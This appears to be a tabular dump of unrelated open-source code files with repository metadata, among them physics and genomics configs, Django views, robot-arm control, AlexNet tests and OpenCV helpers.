| 2023-08-18T20:39:31.954943 | 2023-08-18T09:23:34 | 2023-08-18T09:23:34 | 39,819,875 | 10 | 63 | null | 2023-08-10T14:08:04 | 2015-07-28T07:36:50 |
Python
|
UTF-8
|
Python
| false | false | 2,018 |
py
|
# structure configuration for datacard
#structure = {}
# keys here must match keys in samples.py
#
structure['Fake'] = {
'isSignal' : 0,
'isData' : 0
}
#structure['DY'] = {
# 'isSignal' : 0,
# 'isData' : 0
# }
#
#structure['top'] = {
# 'isSignal' : 0,
# 'isData' : 0
# }
structure['WW'] = {
'isSignal' : 0,
'isData' : 0
}
structure['ggWW'] = {
'isSignal' : 0,
'isData' : 0
}
structure['Wg'] = {
'isSignal' : 0,
'isData' : 0
}
structure['WgS'] = {
'isSignal' : 0,
'isData' : 0
}
structure['Zg'] = {
'isSignal' : 0,
'isData' : 0
}
structure['ZgS'] = {
'isSignal' : 0,
'isData' : 0
}
structure['Vg'] = {
'isSignal' : 0,
'isData' : 0
}
structure['VgS'] = {
'isSignal' : 0,
'isData' : 0
}
structure['WZ'] = {
'isSignal' : 0,
'isData' : 0
}
structure['VVV'] = {
'isSignal' : 0,
'isData' : 0
}
structure['ZZ'] = {
'isSignal' : 0,
'isData' : 0
}
structure['ggH_hww'] = {
'isSignal' : 1,
'isData' : 0
}
structure['qqH_hww'] = {
'isSignal' : 1,
'isData' : 0
}
structure['WH_hww_plus'] = {
'isSignal' : 1,
'isData' : 0
}
structure['WH_hww_minus'] = {
'isSignal' : 1,
'isData' : 0
}
structure['ZH_hww'] = {
'isSignal' : 1,
'isData' : 0
}
structure['ttH_hww'] = {
'isSignal' : 1,
'isData' : 0
}
structure['ggZH_hww'] = {
'isSignal' : 1,
'isData' : 0
}
structure['ggH_htt'] = {
'isSignal' : 1,
'isData' : 0,
}
structure['qqH_htt'] = {
'isSignal' : 1,
'isData' : 0,
}
structure['WH_htt_plus'] = {
'isSignal' : 1,
'isData' : 0,
}
structure['WH_htt_minus'] = {
'isSignal' : 1,
'isData' : 0,
}
structure['ZH_htt'] = {
'isSignal' : 1,
'isData' : 0,
}
# data
structure['DATA'] = {
'isSignal' : 0,
'isData' : 1
}
|
[
"[email protected]"
] | |
ee93303355c66a20ff5ffdd32b3ebf107b00bc0e
|
f5f7a1ae04a999f3f193cca647397b29806edf73
|
/0000_examples/ur3_dual_interpolation_exe.py
|
09b091f802f3706ab9fd2e03f1068f6f58440932
|
[
"MIT"
] |
permissive
|
kazuki0824/wrs
|
bf88d1568f591c61870332436bfcd079d78b87d7
|
03c9e59779a30e2f6dedf2732ad8a46e6ac3c9f0
|
refs/heads/main
| 2023-07-24T05:20:02.054592 | 2021-05-31T14:38:18 | 2021-05-31T14:38:18 | 368,829,423 | 1 | 0 |
MIT
| 2021-05-19T10:25:48 | 2021-05-19T10:25:47 | null |
UTF-8
|
Python
| false | false | 1,191 |
py
|
import math
import numpy as np
import robot_con.ur.ur3_dual_x as u3r85dx
rbtx = u3r85dx.UR3DualX(lft_robot_ip='10.2.0.50', rgt_robot_ip='10.2.0.51', pc_ip='10.2.0.101')
# left randomization
current_lft_jnt_values = rbtx.lft_arm_hnd.get_jnt_values()
n_lft_jnt_values = (current_lft_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
nn_lft_jnt_values = (n_lft_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
nnn_lft_jnt_values = (nn_lft_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
# right randomization
current_rgt_jnt_values = rbtx.rgt_arm_hnd.get_jnt_values()
n_rgt_jnt_values = (current_rgt_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
nn_rgt_jnt_values = (n_rgt_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
nnn_rgt_jnt_values = (nn_rgt_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
rbtx.move_jspace_path([current_lft_jnt_values + current_rgt_jnt_values,
n_lft_jnt_values + n_rgt_jnt_values,
nn_lft_jnt_values + nn_rgt_jnt_values,
nnn_lft_jnt_values + nnn_rgt_jnt_values], control_frequency=0.05)
|
[
"[email protected]"
] | |
1298229e6667d5b56fca496bd5b6d2adb592dec4
|
98c6ea9c884152e8340605a706efefbea6170be5
|
/examples/data/Assignment_1/kdsjor001/question2.py
|
b192808bc1bd49a030995b7d46e982d2aaa24594
|
[] |
no_license
|
MrHamdulay/csc3-capstone
|
479d659e1dcd28040e83ebd9e3374d0ccc0c6817
|
6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2
|
refs/heads/master
| 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 232 |
py
|
a=eval(input('Enter the hours:\n'))
b=eval(input('Enter the minutes:\n'))
c=eval(input('Enter the seconds:\n'))
if 0<=a<=23 and 0<=b<=59 and 0<=c<=59:
print ('Your time is valid.')
else:
print ('Your time is invalid.')
|
[
"[email protected]"
] | |
40f756004da71f05733139a24309c3462c7ec54b
|
43d4b962a83dac734dfb09b8523fdfcfcc6628c1
|
/lavajato_fornecedor/views.py
|
c245e3d77cf35444022eb95c2347a0cc74207d4f
|
[] |
no_license
|
redcliver/sistemas
|
01edd98c2814eee50550010169b2c7594e5256f5
|
1129c9516c57fbf53ce3cf5e0e5feb3835d3e9df
|
refs/heads/master
| 2020-04-07T17:23:04.809752 | 2019-05-02T16:24:18 | 2019-05-02T16:24:18 | 158,567,651 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,460 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render
from .models import fornecedor
# Create your views here.
def lavajato_fornecedor(request):
if request.user.is_authenticated():
empresa = request.user.get_short_name()
if empresa == 'dayson':
if request.method == 'POST' and request.POST.get('nome') != None:
name = request.POST.get('nome')
telefone = request.POST.get('tel')
celular = request.POST.get('cel')
cpf = request.POST.get('cpf')
email = request.POST.get('mail')
endereco = request.POST.get('endereco')
numero = request.POST.get('numero')
bairro = request.POST.get('bairro')
cidade = request.POST.get('cidade')
uf_cidade = request.POST.get('uf_cidade')
novo_fornecedor = fornecedor(nome=name, telefone=telefone, celular=celular, cpf=cpf, email=email, endereco=endereco, numero=numero, bairro=bairro, cidade=cidade, uf_cidade=uf_cidade)
novo_fornecedor.save()
msg = name+" salvo com sucesso!"
return render(request, 'lavajato_fornecedor/fornecedor_novo.html', {'title':'Novo Fornecedor','msg':msg})
return render(request, 'lavajato_fornecedor/fornecedor_novo.html', {'title':'Novo Fornecedor'})
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
else:
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
def busca(request):
if request.user.is_authenticated():
empresa = request.user.get_short_name()
if empresa == 'dayson':
fornecedores = fornecedor.objects.all().order_by('nome')
if request.method == 'POST' and request.POST.get('fornecedor_id') != None:
fornecedor_id = request.POST.get('fornecedor_id')
fornecedor_obj = fornecedor.objects.get(id=fornecedor_id)
return render(request, 'lavajato_fornecedor/fornecedor_visualiza.html', {'title':'Visualizar Fornecedor', 'fornecedor_obj':fornecedor_obj})
return render(request, 'lavajato_fornecedor/fornecedor_busca.html', {'title':'Buscar Fornecedor', 'fornecedores':fornecedores})
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
else:
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
def edita(request):
if request.user.is_authenticated():
empresa = request.user.get_short_name()
if empresa == 'dayson':
fornecedores = fornecedor.objects.all().order_by('nome')
if request.method == 'POST' and request.POST.get('fornecedor_id') != None:
fornecedor_id = request.POST.get('fornecedor_id')
fornecedor_obj = fornecedor.objects.get(id=fornecedor_id)
return render(request, 'lavajato_fornecedor/fornecedor_edita.html', {'title':'Editar Fornecedor', 'fornecedor_obj':fornecedor_obj})
return render(request, 'lavajato_fornecedor/fornecedor_busca_edita.html', {'title':'Editar Fornecedor', 'fornecedores':fornecedores})
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
else:
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
def salva(request):
if request.user.is_authenticated():
empresa = request.user.get_short_name()
if empresa == 'dayson':
fornecedores = fornecedor.objects.all().order_by('nome')
if request.method == 'POST' and request.POST.get('fornecedor_id') != None:
fornecedor_id = request.POST.get('fornecedor_id')
fornecedor_obj = fornecedor.objects.get(id=fornecedor_id)
nome = request.POST.get('nome')
tel = request.POST.get('tel')
cel = request.POST.get('cel')
cpf = request.POST.get('cpf')
mail = request.POST.get('mail')
endereco = request.POST.get('endereco')
numero = request.POST.get('numero')
bairro = request.POST.get('bairro')
cidade = request.POST.get('cidade')
uf_cidade = request.POST.get('uf_cidade')
bloqueado = request.POST.get('bloqueado')
fornecedor_obj.nome = nome
fornecedor_obj.telefone = tel
fornecedor_obj.celular = cel
fornecedor_obj.cpf = cpf
fornecedor_obj.email = mail
fornecedor_obj.endereco = endereco
fornecedor_obj.numero = numero
fornecedor_obj.bairro = bairro
fornecedor_obj.cidade = cidade
fornecedor_obj.uf_cidade = uf_cidade
fornecedor_obj.estado = bloqueado
fornecedor_obj.save()
msg = fornecedor_obj.nome + " editado(a) com sucesso!"
return render(request, 'lavajato_fornecedor/fornecedor_edita.html', {'title':'Editar Fornecedor', 'fornecedor_obj':fornecedor_obj, 'msg':msg})
return render(request, 'lavajato_fornecedor/fornecedor_busca_edita.html', {'title':'Editar Fornecedor', 'fornecedores':fornecedores})
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
else:
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
|
[
"[email protected]"
] | |
005465f20680fb4a6b902a62c9c1f39bd408de7d
|
505b766aeef6dae5fdb2cab9f2550543179e10e9
|
/app/keyvalue/models.py
|
ca70f4fd07e1a6862c13073c71802ea54c71b626
|
[] |
no_license
|
tossedwarrior/wri
|
19b912630d00f64bcccc499ba22418c73c7bf359
|
0d4a0f9d7c36b04f87c7cf0ec42db4a57698137f
|
refs/heads/master
| 2020-12-25T19:27:19.028235 | 2012-06-13T21:03:11 | 2012-06-13T21:03:11 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 837 |
py
|
# -*- encoding: utf-8 -*-
import os
from datetime import datetime
if 'SERVER_SOFTWARE' in os.environ and os.environ['SERVER_SOFTWARE'].startswith('Dev'):
from django.db import models
class JSONData(models.Model):
json = models.TextField(default='[]')
@staticmethod
def get_by_id(id):
return JSONData.objects.get(pk=id)
def put(self):
self.save()
def unique_id(self):
return self.id
class Error(models.Model):
error = models.TextField(default='')
when = models.DateTimeField(default=datetime.now)
@staticmethod
def track(log):
Error(error=log).save();
@staticmethod
def latest():
return Error.objects.order_by('-when')[:10]
else:
from models_appengine import *
|
[
"[email protected]"
] | |
b548b9f7cdadb399f27f06b74930780a08061e79
|
05d5945350fe64f6c1235d4f12ee22323167ca0c
|
/snakemake/configs/mm10_SRP044873.py
|
d77054f2e20301267d8ba829038dad7ea369643b
|
[
"BSD-2-Clause"
] |
permissive
|
saketkc/re-ribo-smk
|
674d4423830bbae3a32f46146ffd362514047a60
|
c9326cbafdfa060e22e9af692d9146c37f5035ba
|
refs/heads/master
| 2021-07-12T18:46:37.772947 | 2020-05-30T01:41:13 | 2020-05-30T01:41:13 | 148,952,525 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,542 |
py
|
RAWDATA_DIR = '/staging/as/skchoudh/re-ribo-datasets/mm10/SRP044873'
OUT_DIR = '/staging/as/skchoudh/re-ribo-analysis/mm10/SRP044873'
GENOME_FASTA = '/home/cmb-06/as/skchoudh/genomes/mm10/fasta/Mus_musculus.GRCm38.dna.primary_assembly.fa'
CHROM_SIZES = '/home/cmb-06/as/skchoudh/genomes/mm10/fasta/Mus_musculus.GRCm38.dna.primary_assembly.sizes'
STAR_INDEX = '/home/cmb-06/as/skchoudh/genomes/mm10/star_annotated_ribopod'
GTF_VERSION = 'v96'
GTF = '/home/cmb-06/as/skchoudh/genomes/mm10/annotation/Mus_musculus.GRCm38.96.chr_patch_hapl_scaff.gtf'
GENE_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/gene.bed.gz'
STAR_CODON_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/start_codon.bed.gz'
STOP_CODON_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/stop_codon.bed.gz'
CDS_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/cds.bed.gz'
UTR5_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/utr5.bed.gz'
UTR3_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/utr3.bed.gz'
INTRON_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/intron.bed.gz'
ORIENTATIONS = ['5prime', '3prime']
STRANDS = ['pos', 'neg', 'combined']
FRAGMENT_LENGTHS = range(18, 39)
RIBOTRICER_ANNOTATION_PREFIX = '/home/cmb-06/as/skchoudh/genomes/mm10/ribotricer_v96_annotation_longest'
|
[
"[email protected]"
] | |
e73bd41c33e69aa417fab4dffaa549a7814efb51
|
9a73c54526082c27e5c5d88bd54950a589233658
|
/DeepLearning/Verification_code_identification/nets/alexnet_test.py
|
f0dc38b9c9f6f80166eb10b496695e7ac63d676d
|
[
"Apache-2.0"
] |
permissive
|
archu2020/python-2
|
af78b65ed7f3ad17f71d4f8a97c002df86908298
|
19c626ca9fd37168db8a7ac075fd80c8e2971313
|
refs/heads/master
| 2022-12-27T12:08:44.316760 | 2020-10-02T15:46:27 | 2020-10-02T15:46:27 | 300,660,839 | 0 | 0 |
Apache-2.0
| 2020-10-02T15:46:28 | 2020-10-02T15:37:58 |
Python
|
UTF-8
|
Python
| false | false | 5,964 |
py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for slim.nets.alexnet."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from nets import alexnet
slim = tf.contrib.slim
class AlexnetV2Test(tf.test.TestCase):
def testBuild(self):
batch_size = 5
height, width = 224, 224
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = alexnet.alexnet_v2(inputs, num_classes)
self.assertEquals(logits.op.name, 'alexnet_v2/fc8/squeezed')
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, num_classes])
def testFullyConvolutional(self):
batch_size = 1
height, width = 300, 400
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = alexnet.alexnet_v2(inputs, num_classes, spatial_squeeze=False)
self.assertEquals(logits.op.name, 'alexnet_v2/fc8/BiasAdd')
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, 4, 7, num_classes])
def testEndPoints(self):
batch_size = 5
height, width = 224, 224
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
_, end_points = alexnet.alexnet_v2(inputs, num_classes)
expected_names = ['alexnet_v2/conv1',
'alexnet_v2/pool1',
'alexnet_v2/conv2',
'alexnet_v2/pool2',
'alexnet_v2/conv3',
'alexnet_v2/conv4',
'alexnet_v2/conv5',
'alexnet_v2/pool5',
'alexnet_v2/fc6',
'alexnet_v2/fc7',
'alexnet_v2/fc8'
]
self.assertSetEqual(set(end_points.keys()), set(expected_names))
def testModelVariables(self):
batch_size = 5
height, width = 224, 224
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
alexnet.alexnet_v2(inputs, num_classes)
expected_names = ['alexnet_v2/conv1/weights',
'alexnet_v2/conv1/biases',
'alexnet_v2/conv2/weights',
'alexnet_v2/conv2/biases',
'alexnet_v2/conv3/weights',
'alexnet_v2/conv3/biases',
'alexnet_v2/conv4/weights',
'alexnet_v2/conv4/biases',
'alexnet_v2/conv5/weights',
'alexnet_v2/conv5/biases',
'alexnet_v2/fc6/weights',
'alexnet_v2/fc6/biases',
'alexnet_v2/fc7/weights',
'alexnet_v2/fc7/biases',
'alexnet_v2/fc8/weights',
'alexnet_v2/fc8/biases',
]
model_variables = [v.op.name for v in slim.get_model_variables()]
self.assertSetEqual(set(model_variables), set(expected_names))
def testEvaluation(self):
batch_size = 2
height, width = 224, 224
num_classes = 1000
with self.test_session():
eval_inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = alexnet.alexnet_v2(eval_inputs, is_training=False)
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, num_classes])
predictions = tf.argmax(logits, 1)
self.assertListEqual(predictions.get_shape().as_list(), [batch_size])
def testTrainEvalWithReuse(self):
train_batch_size = 2
eval_batch_size = 1
train_height, train_width = 224, 224
eval_height, eval_width = 300, 400
num_classes = 1000
with self.test_session():
train_inputs = tf.random_uniform(
(train_batch_size, train_height, train_width, 3))
logits, _ = alexnet.alexnet_v2(train_inputs)
self.assertListEqual(logits.get_shape().as_list(),
[train_batch_size, num_classes])
tf.get_variable_scope().reuse_variables()
eval_inputs = tf.random_uniform(
(eval_batch_size, eval_height, eval_width, 3))
logits, _ = alexnet.alexnet_v2(eval_inputs, is_training=False,
spatial_squeeze=False)
self.assertListEqual(logits.get_shape().as_list(),
[eval_batch_size, 4, 7, num_classes])
logits = tf.reduce_mean(logits, [1, 2])
predictions = tf.argmax(logits, 1)
self.assertEquals(predictions.get_shape().as_list(), [eval_batch_size])
def testForward(self):
batch_size = 1
height, width = 224, 224
with self.test_session() as sess:
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = alexnet.alexnet_v2(inputs)
sess.run(tf.global_variables_initializer())
output = sess.run(logits)
self.assertTrue(output.any())
if __name__ == '__main__':
tf.test.main()
|
[
"[email protected]"
] | |
d72ecdd7a3b850a399fcd9116f3c384b38b3d1d6
|
181e9cc9cf4e52fcc6e9979890cc5b41e7beb756
|
/Module 1/06_Codes/06/06_Codes/managers.py
|
c2650fc77fbc09ebd2367a198a7481ec81ec29c4
|
[
"MIT"
] |
permissive
|
PacktPublishing/OpenCV-Computer-Vision-Projects-with-Python
|
ace8576dce8d5f5db6992b3e5880a717996f78cc
|
45a9c695e5bb29fa3354487e52f29a565d700d5c
|
refs/heads/master
| 2023-02-09T14:10:42.767047 | 2023-01-30T09:02:09 | 2023-01-30T09:02:09 | 71,112,659 | 96 | 72 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,862 |
py
|
import cv2
import numpy
import pygame
import time
import utils
class CaptureManager(object):
def __init__(self, capture, previewWindowManager = None,
shouldMirrorPreview = False):
self.previewWindowManager = previewWindowManager
self.shouldMirrorPreview = shouldMirrorPreview
self._capture = capture
self._channel = 0
self._enteredFrame = False
self._frame = None
self._imageFilename = None
self._videoFilename = None
self._videoEncoding = None
self._videoWriter = None
self._startTime = None
self._framesElapsed = long(0)
self._fpsEstimate = None
@property
def channel(self):
return self._channel
@channel.setter
def channel(self, value):
if self._channel != value:
self._channel = value
self._frame = None
@property
def frame(self):
if self._enteredFrame and self._frame is None:
_, self._frame = self._capture.retrieve(channel = self.channel)
return self._frame
@property
def isWritingImage(self):
return self._imageFilename is not None
@property
def isWritingVideo(self):
return self._videoFilename is not None
def enterFrame(self):
"""Capture the next frame, if any."""
# But first, check that any previous frame was exited.
assert not self._enteredFrame, \
'previous enterFrame() had no matching exitFrame()'
if self._capture is not None:
self._enteredFrame = self._capture.grab()
def exitFrame(self):
"""Draw to the window. Write to files. Release the frame."""
# Check whether any grabbed frame is retrievable.
# The getter may retrieve and cache the frame.
if self.frame is None:
self._enteredFrame = False
return
# Update the FPS estimate and related variables.
if self._framesElapsed == 0:
self._startTime = time.time()
else:
timeElapsed = time.time() - self._startTime
self._fpsEstimate = self._framesElapsed / timeElapsed
self._framesElapsed += 1
# Draw to the window, if any.
if self.previewWindowManager is not None:
if self.shouldMirrorPreview:
mirroredFrame = numpy.fliplr(self._frame).copy()
self.previewWindowManager.show(mirroredFrame)
else:
self.previewWindowManager.show(self._frame)
# Write to the image file, if any.
if self.isWritingImage:
cv2.imwrite(self._imageFilename, self._frame)
self._imageFilename = None
# Write to the video file, if any.
self._writeVideoFrame()
# Release the frame.
self._frame = None
self._enteredFrame = False
def writeImage(self, filename):
"""Write the next exited frame to an image file."""
self._imageFilename = filename
def startWritingVideo(
self, filename,
encoding = cv2.cv.CV_FOURCC('I','4','2','0')):
"""Start writing exited frames to a video file."""
self._videoFilename = filename
self._videoEncoding = encoding
def stopWritingVideo(self):
"""Stop writing exited frames to a video file."""
self._videoFilename = None
self._videoEncoding = None
self._videoWriter = None
def _writeVideoFrame(self):
if not self.isWritingVideo:
return
if self._videoWriter is None:
fps = self._capture.get(cv2.cv.CV_CAP_PROP_FPS)
if fps == 0.0:
# The capture's FPS is unknown so use an estimate.
if self._framesElapsed < 20:
# Wait until more frames elapse so that the
# estimate is more stable.
return
else:
fps = self._fpsEstimate
size = (int(self._capture.get(
cv2.cv.CV_CAP_PROP_FRAME_WIDTH)),
int(self._capture.get(
cv2.cv.CV_CAP_PROP_FRAME_HEIGHT)))
self._videoWriter = cv2.VideoWriter(
self._videoFilename, self._videoEncoding,
fps, size)
self._videoWriter.write(self._frame)
class WindowManager(object):
def __init__(self, windowName, keypressCallback = None):
self.keypressCallback = keypressCallback
self._windowName = windowName
self._isWindowCreated = False
@property
def isWindowCreated(self):
return self._isWindowCreated
def createWindow(self):
cv2.namedWindow(self._windowName)
self._isWindowCreated = True
def show(self, frame):
cv2.imshow(self._windowName, frame)
def destroyWindow(self):
cv2.destroyWindow(self._windowName)
self._isWindowCreated = False
def processEvents(self):
keycode = cv2.waitKey(1)
if self.keypressCallback is not None and keycode != -1:
# Discard any non-ASCII info encoded by GTK.
keycode &= 0xFF
self.keypressCallback(keycode)
class PygameWindowManager(WindowManager):
def createWindow(self):
pygame.display.init()
pygame.display.set_caption(self._windowName)
self._isWindowCreated = True
def show(self, frame):
# Find the frame's dimensions in (w, h) format.
frameSize = frame.shape[1::-1]
# Convert the frame to RGB, which Pygame requires.
if utils.isGray(frame):
conversionType = cv2.COLOR_GRAY2RGB
else:
conversionType = cv2.COLOR_BGR2RGB
rgbFrame = cv2.cvtColor(frame, conversionType)
# Convert the frame to Pygame's Surface type.
pygameFrame = pygame.image.frombuffer(
rgbFrame.tostring(), frameSize, 'RGB')
# Resize the window to match the frame.
displaySurface = pygame.display.set_mode(frameSize)
# Blit and display the frame.
displaySurface.blit(pygameFrame, (0, 0))
pygame.display.flip()
def destroyWindow(self):
pygame.display.quit()
self._isWindowCreated = False
def processEvents(self):
for event in pygame.event.get():
if event.type == pygame.KEYDOWN and \
self.keypressCallback is not None:
self.keypressCallback(event.key)
elif event.type == pygame.QUIT:
self.destroyWindow()
return
|
[
"[email protected]"
] | |
549d26bdfebb26f7e41ffa553e48b04e054ae011
|
5e255ad1360c90478393744586663741a9569c21
|
/linebot/v3/insight/models/get_statistics_per_unit_response_overview.py
|
8dead06a2e9bdba632aa7f0ff33642dfff6804fd
|
[
"Apache-2.0"
] |
permissive
|
line/line-bot-sdk-python
|
d76268e8b542060d6eccbacc5dbfab16960ecc35
|
cffd35948238ae24982173e30b1ea1e595bbefd9
|
refs/heads/master
| 2023-08-31T22:12:31.698183 | 2023-08-28T01:10:09 | 2023-08-28T01:10:09 | 70,553,423 | 1,898 | 1,181 |
Apache-2.0
| 2023-09-11T05:14:07 | 2016-10-11T03:42:26 |
Python
|
UTF-8
|
Python
| false | false | 4,122 |
py
|
# coding: utf-8
"""
LINE Messaging API(Insight)
This document describes LINE Messaging API(Insight). # noqa: E501
The version of the OpenAPI document: 0.0.1
Generated by OpenAPI Generator (https://openapi-generator.tech)
Do not edit the class manually.
"""
from __future__ import annotations
import pprint
import re # noqa: F401
import json
from typing import Optional
from pydantic.v1 import BaseModel, Field, StrictInt
class GetStatisticsPerUnitResponseOverview(BaseModel):
"""
Statistics related to messages.
https://developers.line.biz/en/reference/messaging-api/#get-statistics-per-unit-response
"""
unique_impression: Optional[StrictInt] = Field(None, alias="uniqueImpression", description="Number of users who opened the message, meaning they displayed at least 1 bubble.")
unique_click: Optional[StrictInt] = Field(None, alias="uniqueClick", description="Number of users who opened any URL in the message.")
unique_media_played: Optional[StrictInt] = Field(None, alias="uniqueMediaPlayed", description="Number of users who started playing any video or audio in the message.")
unique_media_played100_percent: Optional[StrictInt] = Field(None, alias="uniqueMediaPlayed100Percent", description="Number of users who played the entirety of any video or audio in the message.")
__properties = ["uniqueImpression", "uniqueClick", "uniqueMediaPlayed", "uniqueMediaPlayed100Percent"]
class Config:
"""Pydantic configuration"""
allow_population_by_field_name = True
validate_assignment = True
def to_str(self) -> str:
"""Returns the string representation of the model using alias"""
return pprint.pformat(self.dict(by_alias=True))
def to_json(self) -> str:
"""Returns the JSON representation of the model using alias"""
return json.dumps(self.to_dict())
@classmethod
def from_json(cls, json_str: str) -> GetStatisticsPerUnitResponseOverview:
"""Create an instance of GetStatisticsPerUnitResponseOverview from a JSON string"""
return cls.from_dict(json.loads(json_str))
def to_dict(self):
"""Returns the dictionary representation of the model using alias"""
_dict = self.dict(by_alias=True,
exclude={
},
exclude_none=True)
# set to None if unique_impression (nullable) is None
# and __fields_set__ contains the field
if self.unique_impression is None and "unique_impression" in self.__fields_set__:
_dict['uniqueImpression'] = None
# set to None if unique_click (nullable) is None
# and __fields_set__ contains the field
if self.unique_click is None and "unique_click" in self.__fields_set__:
_dict['uniqueClick'] = None
# set to None if unique_media_played (nullable) is None
# and __fields_set__ contains the field
if self.unique_media_played is None and "unique_media_played" in self.__fields_set__:
_dict['uniqueMediaPlayed'] = None
# set to None if unique_media_played100_percent (nullable) is None
# and __fields_set__ contains the field
if self.unique_media_played100_percent is None and "unique_media_played100_percent" in self.__fields_set__:
_dict['uniqueMediaPlayed100Percent'] = None
return _dict
@classmethod
def from_dict(cls, obj: dict) -> GetStatisticsPerUnitResponseOverview:
"""Create an instance of GetStatisticsPerUnitResponseOverview from a dict"""
if obj is None:
return None
if not isinstance(obj, dict):
return GetStatisticsPerUnitResponseOverview.parse_obj(obj)
_obj = GetStatisticsPerUnitResponseOverview.parse_obj({
"unique_impression": obj.get("uniqueImpression"),
"unique_click": obj.get("uniqueClick"),
"unique_media_played": obj.get("uniqueMediaPlayed"),
"unique_media_played100_percent": obj.get("uniqueMediaPlayed100Percent")
})
return _obj
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.